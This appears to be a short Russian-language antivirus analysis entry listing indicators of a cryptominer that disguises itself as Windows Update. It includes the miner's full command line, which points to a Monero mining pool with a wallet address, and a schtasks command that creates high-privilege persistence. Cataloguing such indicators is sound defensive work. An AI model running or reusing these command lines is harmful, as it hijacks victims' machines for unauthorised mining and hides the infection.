Техническая информация
- <SYSTEM32>\tasks\windowsupdate
- %WINDIR%\explorer.exe
- %LOCALAPPDATA%\windowsupdateversion-3.3.78\update.exe
- %TEMP%\winring0x64.sys
- 'ht##bin.org':80
- 'di##ord.com':443
- http://ht##bin.org/ip
- 'di##ord.com':443
- DNS ASK ht##bin.org
- DNS ASK di##ord.com
- '%LOCALAPPDATA%\windowsupdateversion-3.3.78\update.exe'
- '%LOCALAPPDATA%\windowsupdateversion-3.3.78\update.exe' ' (со скрытым окном)
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 70 -o xmr-eu1.nanopool.org:14444 -u 4ALmTFkPEAf4jysEzBjQw9eXdpFpoSsBW5n7US7QnzyC539PyFFB6pFUcyBxzy24fSeyztn6kbEo4ZB6oQapob8HA4h69MU.worker -p kay' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn WindowsUpdate /rl HIGHEST /tr %LOCALAPPDATA%\WindowsUpdateVersion-3.3.78\update.exe
- '<SYSTEM32>\taskeng.exe' {A49378D8-02F3-4439-AD7C-13EDF1908967} S-1-5-21-1960123792-2022915161-3775307078-1001:xpkbajdqqv\user:Interactive:[1]
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 70 -o xmr-eu1.nanopool.org:14444 -u 4ALmTFkPEAf4jysEzBjQw9eXdpFpoSsBW5n7US7QnzyC539PyFFB6pFUcyBxzy24fSeyztn6kbEo4ZB6oQapob8HA4h69MU.worker -p kay